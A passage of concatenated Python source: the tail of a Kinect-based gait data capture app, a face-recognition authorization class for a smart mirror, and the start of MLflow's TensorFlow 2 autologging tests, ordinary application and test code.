self._clock = pygame.time.Clock()
# Set the width and height of the screen [width, height]
self._infoObject = pygame.display.Info()
self._screen = pygame.display.set_mode(((self._infoObject.current_w >> 1) + 300, (self._infoObject.current_h >> 1) + 300),
pygame.HWSURFACE|pygame.DOUBLEBUF|pygame.RESIZABLE, 32)
# pygame.display.set_caption("Kinect-based Gait Data Acquisition Software")
pygame.display.set_caption("基于Kinect的步态数据采集系统v1.0")
# Loop until the user clicks the close button.
self._done = False
# Used to manage how fast the screen updates
self._clock = pygame.time.Clock()
# Kinect runtime object, we want only color and body frames
self._kinect = PyKinectRuntime(PyKinectV2.FrameSourceTypes_Color | PyKinectV2.FrameSourceTypes_Body)
# back buffer surface for getting Kinect color frames, 32bit color, width and height equal to the Kinect color frame size
self._frame_surface = pygame.Surface((self._kinect.color_frame_desc.Width, self._kinect.color_frame_desc.Height), 0, 32)
# surface to draw skeleton
self._skeleton_surface = pygame.Surface((self._kinect.color_frame_desc.Width, self._kinect.color_frame_desc.Height), 0, 32)
self._gui_surface = pygame.Surface((self._screen.get_width(), self._screen.get_height() // 2), 0, 32)
# here we will store skeleton data
self._bodies = None
# self.app = gui.App()
self.app = gui.Desktop()
# self.app.screen = self._gui_surface
self.skeletonCtrl =SkeletonControl()
# self.c = gui.Container(align=-1,valign=-1, x=self._screen.get_width() // 2, y=self._frame_surface.get_height() // 2)
self.c = gui.Container(align=-1,valign=-1, x=0, y=0)
# self.c.add(self.skeletonCtrl,0, 0)
self.c.add(self.skeletonCtrl,300, 0)
# self.app.init(widget=self.c)#, screen=self._gui_surface) # area=(0, self._screen.get_height() // 2, self._screen.get_width(), self._screen.get_height() // 2))
# self.app.init(widget=self.c, screen=self._screen, area=pygame.Rect(0, self._screen.get_height() // 2, self._screen.get_width(), self._screen.get_height() // 2))
self.h_to_w = float(self._frame_surface.get_height()) / self._frame_surface.get_width()
# print self._frame_surface.get_height(), self._frame_surface.get_width()
self.target_height = int(self.h_to_w * self._screen.get_width() // 2)
self.app.init(widget=self.c, screen=self._screen, area=pygame.Rect(0, self.target_height, self._screen.get_width(), self._screen.get_height() - self.target_height))
# self.warning_dialog = WarningdDialog()
def draw_body_bone(self, joints, jointPoints, color, joint0, joint1):
joint0State = joints[joint0].TrackingState
joint1State = joints[joint1].TrackingState
# both joints are not tracked
if (joint0State == PyKinectV2.TrackingState_NotTracked) or (joint1State == PyKinectV2.TrackingState_NotTracked):
return
# both joints are not *really* tracked
if (joint0State == PyKinectV2.TrackingState_Inferred) and (joint1State == PyKinectV2.TrackingState_Inferred):
return
# ok, at least one is good
start = (jointPoints[joint0].x, jointPoints[joint0].y)
end = (jointPoints[joint1].x, jointPoints[joint1].y)
try:
pygame.draw.line(self._skeleton_surface, color, start, end, 8)
except: # need to catch it due to possible invalid positions (with inf)
pass
def draw_body(self, joints, jointPoints, color):
# Torso
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_Head, PyKinectV2.JointType_Neck)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_Neck, PyKinectV2.JointType_SpineShoulder)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_SpineShoulder, PyKinectV2.JointType_SpineMid)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_SpineMid, PyKinectV2.JointType_SpineBase)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_SpineShoulder, PyKinectV2.JointType_ShoulderRight)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_SpineShoulder, PyKinectV2.JointType_ShoulderLeft)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_SpineBase, PyKinectV2.JointType_HipRight)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_SpineBase, PyKinectV2.JointType_HipLeft)
# Right Arm
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_ShoulderRight, PyKinectV2.JointType_ElbowRight)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_ElbowRight, PyKinectV2.JointType_WristRight)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_WristRight, PyKinectV2.JointType_HandRight)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_HandRight, PyKinectV2.JointType_HandTipRight)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_WristRight, PyKinectV2.JointType_ThumbRight)
# Left Arm
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_ShoulderLeft, PyKinectV2.JointType_ElbowLeft)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_ElbowLeft, PyKinectV2.JointType_WristLeft)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_WristLeft, PyKinectV2.JointType_HandLeft)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_HandLeft, PyKinectV2.JointType_HandTipLeft)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_WristLeft, PyKinectV2.JointType_ThumbLeft)
# Right Leg
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_HipRight, PyKinectV2.JointType_KneeRight)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_KneeRight, PyKinectV2.JointType_AnkleRight)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_AnkleRight, PyKinectV2.JointType_FootRight)
# Left Leg
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_HipLeft, PyKinectV2.JointType_KneeLeft)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_KneeLeft, PyKinectV2.JointType_AnkleLeft)
self.draw_body_bone(joints, jointPoints, color, PyKinectV2.JointType_AnkleLeft, PyKinectV2.JointType_FootLeft)
def draw_color_frame(self, frame, target_surface):
target_surface.lock()
address = self._kinect.surface_as_array(target_surface.get_buffer())
ctypes.memmove(address, frame.ctypes.data, frame.size)
del address
target_surface.unlock()
def run(self):
# run a new thread to receive socket data
socket_receiver = SocketReceiver()
receiver = threading.Thread(target=socket_receiver.run)
receiver.start()
# -------- Main Program Loop -----------
while not self._done:
# self.app.init(widget=self.c, screen=self._screen, area=pygame.Rect(0, self._screen.get_height() // 2, self._screen.get_width(), self._screen.get_height() // 2))
# --- Main event loop
for event in pygame.event.get(): # User did something
if event.type == pygame.QUIT: # If user clicked close
self._done = True # Flag that we are done so we exit this loop
elif event.type == pygame.VIDEORESIZE: # window resized
self._screen = pygame.display.set_mode(event.dict['size'],
pygame.HWSURFACE|pygame.DOUBLEBUF|pygame.RESIZABLE, 32)
self.target_height = int(self.h_to_w * self._screen.get_width() // 2)
# self.app.init(widget=self.c, screen=self._screen, area=pygame.Rect(0, self._screen.get_height() // 2 + 50, self._screen.get_width(), self._screen.get_height() // 2 - 50))
self.app.init(widget=self.c, screen=self._screen, area=pygame.Rect(0, self.target_height, self._screen.get_width(), self._screen.get_height() - self.target_height))
else:
self.app.event(event)
# print self._frame_surface.get_rect()
# print self._skeleton_surface.get_rect()
# --- Game logic should go here
# --- Getting frames and drawing
# --- Woohoo! We've got a color frame! Let's fill out back buffer surface with frame's data
if self._kinect.has_new_color_frame():
frame = self._kinect.get_last_color_frame()
self.draw_color_frame(frame, self._frame_surface)
frame = None
# --- Cool! We have a body frame, so can get skeletons
if self._kinect.has_new_body_frame():
self._bodies = self._kinect.get_last_body_frame()
# else:
# self._bodies = None
# --- draw skeletons to _frame_surface and write skeleton data to txt
if self._bodies is not None:
counter = 0
for i in range(0, self._kinect.max_body_count):
body = self._bodies.bodies[i]
if not body.is_tracked:
counter += 1
if counter == self._kinect.max_body_count:
SkeletonControl.textarea.value = "no skeleton data to record"
continue
if SkeletonControl.textarea.value == "no skeleton data to record":
SkeletonControl.textarea.value = "click 'start' to record"
joints = body.joints
# convert joint coordinates to color space
joint_points = self._kinect.body_joints_to_color_space(joints)
self.draw_body(joints, joint_points, SKELETON_COLORS[i])
# save skeleton data to .txt file
if SkeletonControl.run_capture == True:
SkeletonControl.textarea.value = "recording......"
with open(SkeletonControl.mydatetime + "-" + SkeletonControl.name.value + "-" + SkeletonControl.kl_result.value + ".txt",'a') as f:
for i in range(PyKinectV2.JointType_Count):
f.write('{:.7f}'.format(joints[i].Position.x) + ' ' + '{:.7f}'.format(joints[i].Position.y) + ' ' + '{:.7f}'.format(joints[i].Position.z) + ' ')
f.write("\n")
# --- copy back buffer surface pixels to the screen, resize it if needed and keep aspect ratio
# --- (screen size may be different from Kinect's color frame size)
# h_to_w = float(self._frame_surface.get_height()) / self._frame_surface.get_width()
# print self._frame_surface.get_height(), self._frame_surface.get_width()
# target_height = int(self.h_to_w * self._screen.get_width() // 2)
surface_to_draw = pygame.transform.scale(self._frame_surface, (self._screen.get_width() // 2, self.target_height))
if SkeletonControl.save_pic == True:
pygame.image.save(self._frame_surface, self.skeletonCtrl.get_datetime_string() + "-" + SkeletonControl.name.value + '-' + SkeletonControl.kl_result.value + '.png')
MassageBox.msg ='picture saved'
picture_saved_dialog = MassageBox()
picture_saved_dialog.open()
SkeletonControl.save_pic = False
skeleton_surface_to_draw = pygame.transform.scale(self._skeleton_surface, (self._screen.get_width() // 2, self.target_height))
# gui_surface_to_draw = pygame.transform.scale(self._gui_surface, (self._screen.get_width(), self._screen.get_height() // 2))
self._screen.blit(surface_to_draw, (0,0))
self._screen.blit(skeleton_surface_to_draw, (self._screen.get_width() // 2, 0))
# self._screen.blit(gui_surface_to_draw, (0, self._screen.get_height() // 2))
surface_to_draw = None
skeleton_surface_to_draw = None
# gui_surface_to_draw = None
self._skeleton_surface.fill((0, 0, 0))
pygame.display.update()
self.app.paint()
# --- Go ahead and update the screen with what we've drawn.
pygame.display.flip()
# --- Limit to 30 frames per second
self._clock.tick(30)
# Close our Kinect sensor, close the window and quit.
self._kinect.close()
pygame.quit()
__main__ = "Kinect v2 Body Game"
game = BodyGameRuntime()
game.run()
|
authorization.py
|
import cv2
import os
import sys
import pickle
import face_recognition
from threading import Thread
from smartmirror.Logger import Logger
PATH = os.path.dirname(os.path.realpath(__file__))
if sys.platform != 'linux':
PATH = PATH.replace("\\", '/')
"""
Authorization Class
- authorization is based on face recognition method
- two options available :
1. opencv face lib
2. face_recognition (dlib)
- name_id is collected by a folder name where person images are located
"""
class Authorization:
def __init__(self, camera, callback):
self.camera = camera
self.callback_authorized_user = callback
self.thread_running = False
self.authorization_process_running = False
self.debug = False
self.font = cv2.FONT_HERSHEY_SIMPLEX
self.detected = {}
self.samples_confidence = 20
self.min_width = 0.1 * self.camera.get(3)
self.min_height = 0.1 * self.camera.get(4)
try:
self.face_cascade = cv2.CascadeClassifier(PATH + '/../cascades/haarcascade_frontal_face_default.xml')
except Exception as exception:
print("Face Cascade Classifier reading file problem: {0}".format(exception))
return
def run_opencv_face_recognition(self):
folders_name = [f for f in os.listdir(PATH + '/../dataset')]
tmp = 0
faces_dic = {}
for name_id in folders_name:
if name_id not in faces_dic.values():
faces_dic[tmp] = name_id
tmp += 1
recognizer = cv2.face.LBPHFaceRecognizer_create() # https://docs.opencv.org/3.4/d4/d48/namespacecv_1_1face.html
recognizer.read(PATH + '/../trained_data/trainer.yml')
while self.thread_running and self.authorization_process_running:
response, image = self.camera.read()
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
detected_face_square = self.face_cascade.detectMultiScale(gray, scaleFactor=1.2, minNeighbors=5,
minSize=(int(self.min_width), int(self.min_height)))
for (x, y, width, height) in detected_face_square:
cv2.rectangle(image, (x, y), (x + width, y + height), (0, 255, 0), 2)
name_id, confidence = recognizer.predict(gray[y:y + height, x:x + width])
recognition_name = "unknown"
if(confidence < 100):
recognition_name = faces_dic[name_id]
confidence = " {0}%".format(round(100 - confidence))
self.add_detected_face(str(recognition_name))
else:
confidence = " {0}%".format(round(100 - confidence))
cv2.putText(image, str(recognition_name), (x + 5, y - 5), self.font, 1, (255, 255, 255), 1)
cv2.putText(image, str(confidence), (x + 5, y + height - 5), self.font, 1, (255, 255, 255), 1)
if self.debug:
cv2.imshow('Authorization detected', image)
cv2.waitKey(10)
def run_dlib_face_recognition(self):
data = pickle.loads(open(PATH + "/../trained_data/encodings.pickle", "rb").read())
while self.thread_running and self.authorization_process_running:
response, image = self.camera.read()
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
detected_face_square = self.face_cascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5,
minSize=(int(self.min_width), int(self.min_height)))
boxes = [(y, x + width, y + height, x) for (x, y, width, height) in detected_face_square]
encodings = face_recognition.face_encodings(rgb, boxes)
names = []
recognition_name = "Unknown"
for encoding in encodings:
matches = face_recognition.compare_faces(data["encodings"], encoding)
if True in matches:
matched_index = [i for (i, b) in enumerate(matches) if b]
counts = {}
for i in matched_index:
recognition_name = data["names"][i]
counts[recognition_name] = counts.get(recognition_name, 0) + 1
recognition_name = max(counts, key=counts.get)
names.append(recognition_name)
for ((top, right, bottom, left), name) in zip(boxes, names):
cv2.rectangle(image, (left, top), (right, bottom), (0, 255, 0), 2)
y = top - 15 if top - 15 > 15 else top + 15
cv2.putText(image, name, (left, y), self.font, 1, (255, 255, 255), 1)
if recognition_name != "Unknown":
self.add_detected_face(recognition_name)
if self.debug:
cv2.imshow('Authorization detected', image)
cv2.waitKey(10)
def add_detected_face(self, name):
Logger.debug("Detected {0}".format(name))
if name in self.detected:
self.detected[name] += 1
else:
self.detected[name] = 1
self.recognition_confidence()
def recognition_confidence(self):
Logger.debug("Authorization confidence {0}".format(self.detected))
if self.samples_confidence in self.detected.values():
Logger.debug("Authorization confidence {0}".format(self.samples_confidence))
self.authorization_process_running = False
for name, confidence in self.detected.items():
if self.samples_confidence == confidence:
self.callback_authorized_user(name)
def run(self, method='opencv_face_recognition', debug=False):
Logger.debug("Start authorization thread: {0}".format(method))
self.thread_running = True
self.authorization_process_running = True
self.debug = debug
if method is 'opencv_face_recognition':
target = self.run_opencv_face_recognition
if method is 'dlib_face_recognition':
target = self.run_dlib_face_recognition
listener_thread = Thread(target=target)
listener_thread.daemon = True
listener_thread.start()
def stop(self):
Logger.debug("Stop authorization thread")
self.thread_running = False
if __name__ == "__main__":
pass
|
test_tensorflow2_autolog.py
|
# pep8: disable=E501
import collections
import pytest
import sys
import pickle
from packaging.version import Version
import numpy as np
import pandas as pd
import tensorflow as tf
from tensorflow.keras import layers
import mlflow
import mlflow.tensorflow
from mlflow.tensorflow._autolog import _TensorBoard, __MLflowTfKeras2Callback
import mlflow.keras
from mlflow.tracking.client import MlflowClient
from mlflow.utils.autologging_utils import BatchMetricsLogger, autologging_is_disabled
from unittest.mock import patch
import os
np.random.seed(1337)
SavedModelInfo = collections.namedtuple(
"SavedModelInfo",
["path", "meta_graph_tags", "signature_def_key", "inference_df", "expected_results_df"],
)
@pytest.fixture(autouse=True)
def clear_session():
yield
tf.keras.backend.clear_session()
@pytest.fixture
def random_train_data():
return np.random.random((150, 4))
@pytest.fixture
def random_one_hot_labels():
n, n_class = (150, 3)
classes = np.random.randint(0, n_class, n)
labels = np.zeros((n, n_class))
labels[np.arange(n), classes] = 1
return labels
@pytest.fixture
def clear_tf_keras_imports():
"""
Simulates a state where `tensorflow` and `keras` are not imported by removing these
libraries from the `sys.modules` dictionary. This is useful for testing the interaction
between TensorFlow / Keras and the fluent `mlflow.autolog()` API because it will cause import
hooks to be re-triggered upon re-import after `mlflow.autolog()` is enabled.
"""
sys.modules.pop("tensorflow", None)
sys.modules.pop("keras", None)
@pytest.fixture(autouse=True)
def clear_fluent_autologging_import_hooks():
"""
Clears import hooks for MLflow fluent autologging (`mlflow.autolog()`) between tests
to ensure that interactions between fluent autologging and TensorFlow / tf.keras can
be tested successfully
"""
mlflow.utils.import_hooks._post_import_hooks.pop("tensorflow", None)
mlflow.utils.import_hooks._post_import_hooks.pop("keras", None)
def create_tf_keras_model():
model = tf.keras.Sequential()
model.add(layers.Dense(16, activation="relu", input_shape=(4,)))
model.add(layers.Dense(3, activation="softmax"))
model.compile(
optimizer=tf.keras.optimizers.Adam(), loss="categorical_crossentropy", metrics=["accuracy"]
)
return model
@pytest.mark.large
def test_tf_keras_autolog_ends_auto_created_run(random_train_data, random_one_hot_labels):
mlflow.tensorflow.autolog()
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10)
assert mlflow.active_run() is None
@pytest.mark.large
@pytest.mark.parametrize("log_models", [True, False])
def test_tf_keras_autolog_log_models_configuration(
random_train_data, random_one_hot_labels, log_models
):
# pylint: disable=unused-argument
mlflow.tensorflow.autolog(log_models=log_models)
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10)
client = mlflow.tracking.MlflowClient()
run_id = client.list_run_infos(experiment_id="0")[0].run_id
artifacts = client.list_artifacts(run_id)
artifacts = map(lambda x: x.path, artifacts)
assert ("model" in artifacts) == log_models
@pytest.mark.large
def test_tf_keras_autolog_persists_manually_created_run(random_train_data, random_one_hot_labels):
mlflow.tensorflow.autolog()
with mlflow.start_run() as run:
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10)
assert mlflow.active_run()
assert mlflow.active_run().info.run_id == run.info.run_id
@pytest.fixture
def tf_keras_random_data_run(random_train_data, random_one_hot_labels, initial_epoch):
# pylint: disable=unused-argument
mlflow.tensorflow.autolog()
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
history = model.fit(
data, labels, epochs=initial_epoch + 10, steps_per_epoch=1, initial_epoch=initial_epoch
)
client = mlflow.tracking.MlflowClient()
return client.get_run(client.list_run_infos(experiment_id="0")[0].run_id), history
@pytest.mark.large
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_logs_expected_data(tf_keras_random_data_run):
run, history = tf_keras_random_data_run
data = run.data
assert "accuracy" in data.metrics
assert "loss" in data.metrics
# Testing explicitly passed parameters are logged correctly
assert "epochs" in data.params
assert data.params["epochs"] == str(history.epoch[-1] + 1)
assert "steps_per_epoch" in data.params
assert data.params["steps_per_epoch"] == "1"
# Testing default parameters are logged correctly
assert "initial_epoch" in data.params
assert data.params["initial_epoch"] == str(history.epoch[0])
# Testing unwanted parameters are not logged
assert "callbacks" not in data.params
assert "validation_data" not in data.params
# Testing optimizer parameters are logged
assert "opt_name" in data.params
assert data.params["opt_name"] == "Adam"
assert "opt_learning_rate" in data.params
assert "opt_decay" in data.params
assert "opt_beta_1" in data.params
assert "opt_beta_2" in data.params
assert "opt_epsilon" in data.params
assert "opt_amsgrad" in data.params
assert data.params["opt_amsgrad"] == "False"
client = mlflow.tracking.MlflowClient()
all_epoch_acc = client.get_metric_history(run.info.run_id, "accuracy")
num_of_epochs = len(history.history["loss"])
assert len(all_epoch_acc) == num_of_epochs == 10
artifacts = client.list_artifacts(run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model_summary.txt" in artifacts
@pytest.mark.large
def test_tf_keras_autolog_records_metrics_for_last_epoch(random_train_data, random_one_hot_labels):
every_n_iter = 5
num_training_epochs = 17
mlflow.tensorflow.autolog(every_n_iter=every_n_iter)
model = create_tf_keras_model()
with mlflow.start_run() as run:
model.fit(
random_train_data,
random_one_hot_labels,
epochs=num_training_epochs,
initial_epoch=0,
)
client = mlflow.tracking.MlflowClient()
run_metrics = client.get_run(run.info.run_id).data.metrics
assert "accuracy" in run_metrics
all_epoch_acc = client.get_metric_history(run.info.run_id, "accuracy")
assert set([metric.step for metric in all_epoch_acc]) == set([0, 5, 10, 15])
@pytest.mark.large
def test_tf_keras_autolog_logs_metrics_for_single_epoch_training(
random_train_data, random_one_hot_labels
):
"""
tf.Keras exhibits inconsistent epoch indexing behavior in comparison with other
TF2 APIs (e.g., tf.Estimator). tf.Keras uses zero-indexing for epochs,
while other APIs use one-indexing. Accordingly, this test verifies that metrics are
produced in the boundary case where a model is trained for a single epoch, ensuring
that we don't miss the zero index in the tf.Keras case.
"""
mlflow.tensorflow.autolog(every_n_iter=5)
model = create_tf_keras_model()
with mlflow.start_run() as run:
model.fit(random_train_data, random_one_hot_labels, epochs=1)
client = mlflow.tracking.MlflowClient()
run_metrics = client.get_run(run.info.run_id).data.metrics
assert "accuracy" in run_metrics
assert "loss" in run_metrics
@pytest.mark.large
def test_tf_keras_autolog_names_positional_parameters_correctly(
random_train_data, random_one_hot_labels
):
mlflow.tensorflow.autolog(every_n_iter=5)
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
with mlflow.start_run():
# Pass `batch_size` as a positional argument for testing purposes
model.fit(data, labels, 8, epochs=10, steps_per_epoch=1)
run_id = mlflow.active_run().info.run_id
client = mlflow.tracking.MlflowClient()
run_info = client.get_run(run_id)
assert run_info.data.params.get("batch_size") == "8"
@pytest.mark.large
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_model_can_load_from_artifact(tf_keras_random_data_run, random_train_data):
run, _ = tf_keras_random_data_run
client = mlflow.tracking.MlflowClient()
artifacts = client.list_artifacts(run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model" in artifacts
assert "tensorboard_logs" in artifacts
model = mlflow.keras.load_model("runs:/" + run.info.run_id + "/model")
model.predict(random_train_data)
def get_tf_keras_random_data_run_with_callback(
random_train_data,
random_one_hot_labels,
callback,
restore_weights,
patience,
initial_epoch,
):
# pylint: disable=unused-argument
mlflow.tensorflow.autolog(every_n_iter=1)
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
if callback == "early":
# min_delta is set as such to guarantee early stopping
callback = tf.keras.callbacks.EarlyStopping(
monitor="loss",
patience=patience,
min_delta=99999999,
restore_best_weights=restore_weights,
verbose=1,
)
else:
class CustomCallback(tf.keras.callbacks.Callback):
def on_train_end(self, logs=None):
print("Training completed")
callback = CustomCallback()
history = model.fit(
data, labels, epochs=initial_epoch + 10, callbacks=[callback], initial_epoch=initial_epoch
)
client = mlflow.tracking.MlflowClient()
return client.get_run(client.list_run_infos(experiment_id="0")[0].run_id), history, callback
@pytest.fixture
def tf_keras_random_data_run_with_callback(
random_train_data,
random_one_hot_labels,
callback,
restore_weights,
patience,
initial_epoch,
):
return get_tf_keras_random_data_run_with_callback(
random_train_data,
random_one_hot_labels,
callback,
restore_weights,
patience,
initial_epoch,
)
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [True])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [0, 1, 5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_early_stop_logs(tf_keras_random_data_run_with_callback, initial_epoch):
run, history, callback = tf_keras_random_data_run_with_callback
metrics = run.data.metrics
params = run.data.params
assert "patience" in params
assert params["patience"] == str(callback.patience)
assert "monitor" in params
assert params["monitor"] == "loss"
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" in metrics
assert "restored_epoch" in metrics
restored_epoch = int(metrics["restored_epoch"])
# In this test, the best epoch is always the first epoch because the early stopping callback
# never observes a loss improvement due to an extremely large `min_delta` value
assert restored_epoch == initial_epoch
assert "loss" in history.history
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check that MLflow has logged the metrics of the "best" model, in addition to per-epoch metrics
loss = history.history["loss"]
assert len(metric_history) == len(loss) + 1
steps, values = map(list, zip(*[(m.step, m.value) for m in metric_history]))
# Check that MLflow has logged the correct steps
assert steps == [*history.epoch, callback.stopped_epoch + 1]
# Check that MLflow has logged the correct metric values
np.testing.assert_allclose(values, [*loss, callback.best])
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [True])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [0, 1, 5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_batch_metrics_logger_logs_expected_metrics(
callback,
restore_weights,
patience,
initial_epoch,
random_train_data,
random_one_hot_labels,
):
patched_metrics_data = []
# Mock patching BatchMetricsLogger.record_metrics()
# to ensure that expected metrics are being logged.
original = BatchMetricsLogger.record_metrics
with patch(
"mlflow.utils.autologging_utils.BatchMetricsLogger.record_metrics", autospec=True
) as record_metrics_mock:
def record_metrics_side_effect(self, metrics, step=None):
patched_metrics_data.extend(metrics.items())
original(self, metrics, step)
record_metrics_mock.side_effect = record_metrics_side_effect
run, _, callback = get_tf_keras_random_data_run_with_callback(
random_train_data,
random_one_hot_labels,
callback,
restore_weights,
patience,
initial_epoch,
)
patched_metrics_data = dict(patched_metrics_data)
original_metrics = run.data.metrics
for metric_name in original_metrics:
assert metric_name in patched_metrics_data
restored_epoch = int(patched_metrics_data["restored_epoch"])
assert restored_epoch == initial_epoch
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [True])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [11])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_early_stop_no_stop_does_not_log(tf_keras_random_data_run_with_callback):
run, history, callback = tf_keras_random_data_run_with_callback
metrics = run.data.metrics
params = run.data.params
assert "patience" in params
assert params["patience"] == str(callback.patience)
assert "monitor" in params
assert params["monitor"] == "loss"
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" not in metrics
assert "restored_epoch" not in metrics
assert "loss" in history.history
num_of_epochs = len(history.history["loss"])
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check the test epoch numbers are correct
assert num_of_epochs == 10
assert len(metric_history) == num_of_epochs
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [False])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_early_stop_no_restore_doesnt_log(tf_keras_random_data_run_with_callback):
run, history, callback = tf_keras_random_data_run_with_callback
metrics = run.data.metrics
params = run.data.params
assert "patience" in params
assert params["patience"] == str(callback.patience)
assert "monitor" in params
assert params["monitor"] == "loss"
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" in metrics
assert "restored_epoch" not in metrics
assert "loss" in history.history
num_of_epochs = len(history.history["loss"])
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check the test epoch numbers are correct
assert num_of_epochs == callback.patience + 1
assert len(metric_history) == num_of_epochs
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [False])
@pytest.mark.parametrize("callback", ["not-early"])
@pytest.mark.parametrize("patience", [5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_non_early_stop_callback_no_log(tf_keras_random_data_run_with_callback):
run, history = tf_keras_random_data_run_with_callback[:-1]
metrics = run.data.metrics
params = run.data.params
assert "patience" not in params
assert "monitor" not in params
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" not in metrics
assert "restored_epoch" not in metrics
assert "loss" in history.history
num_of_epochs = len(history.history["loss"])
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check the test epoch numbers are correct
assert num_of_epochs == 10
assert len(metric_history) == num_of_epochs
@pytest.mark.parametrize("positional", [True, False])
def test_tf_keras_autolog_does_not_mutate_original_callbacks_list(
tmpdir, random_train_data, random_one_hot_labels, positional
):
"""
TensorFlow autologging passes new callbacks to the `fit()` / `fit_generator()` function. If
preexisting user-defined callbacks already exist, these new callbacks are added to the
user-specified ones. This test verifies that the new callbacks are added to the without
permanently mutating the original list of callbacks.
"""
mlflow.tensorflow.autolog()
tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=tmpdir)
callbacks = [tensorboard_callback]
model = create_tf_keras_model()
data = random_train_data
labels = random_one_hot_labels
if positional:
model.fit(data, labels, None, 10, 1, callbacks)
else:
model.fit(data, labels, epochs=10, callbacks=callbacks)
assert len(callbacks) == 1
assert callbacks == [tensorboard_callback]
@pytest.mark.large
def test_tf_keras_autolog_does_not_delete_logging_directory_for_tensorboard_callback(
tmpdir, random_train_data, random_one_hot_labels
):
tensorboard_callback_logging_dir_path = str(tmpdir.mkdir("tb_logs"))
tensorboard_callback = tf.keras.callbacks.TensorBoard(
tensorboard_callback_logging_dir_path, histogram_freq=0
)
mlflow.tensorflow.autolog()
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10, callbacks=[tensorboard_callback])
assert os.path.exists(tensorboard_callback_logging_dir_path)
@pytest.mark.large
def test_tf_keras_autolog_logs_to_and_deletes_temporary_directory_when_tensorboard_callback_absent(
tmpdir, random_train_data, random_one_hot_labels
):
from unittest import mock
from mlflow.tensorflow import _TensorBoardLogDir
mlflow.tensorflow.autolog()
mock_log_dir_inst = _TensorBoardLogDir(location=str(tmpdir.mkdir("tb_logging")), is_temp=True)
with mock.patch("mlflow.tensorflow._TensorBoardLogDir", autospec=True) as mock_log_dir_class:
mock_log_dir_class.return_value = mock_log_dir_inst
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10)
assert not os.path.exists(mock_log_dir_inst.location)
def create_tf_estimator_model(directory, export, training_steps=100, use_v1_estimator=False):
CSV_COLUMN_NAMES = ["SepalLength", "SepalWidth", "PetalLength", "PetalWidth", "Species"]
train = pd.read_csv(
os.path.join(os.path.dirname(__file__), "iris_training.csv"),
names=CSV_COLUMN_NAMES,
header=0,
)
train_y = train.pop("Species")
def input_fn(features, labels, training=True, batch_size=256):
"""An input function for training or evaluating"""
# Convert the inputs to a Dataset.
dataset = tf.data.Dataset.from_tensor_slices((dict(features), labels))
# Shuffle and repeat if you are in training mode.
if training:
dataset = dataset.shuffle(1000).repeat()
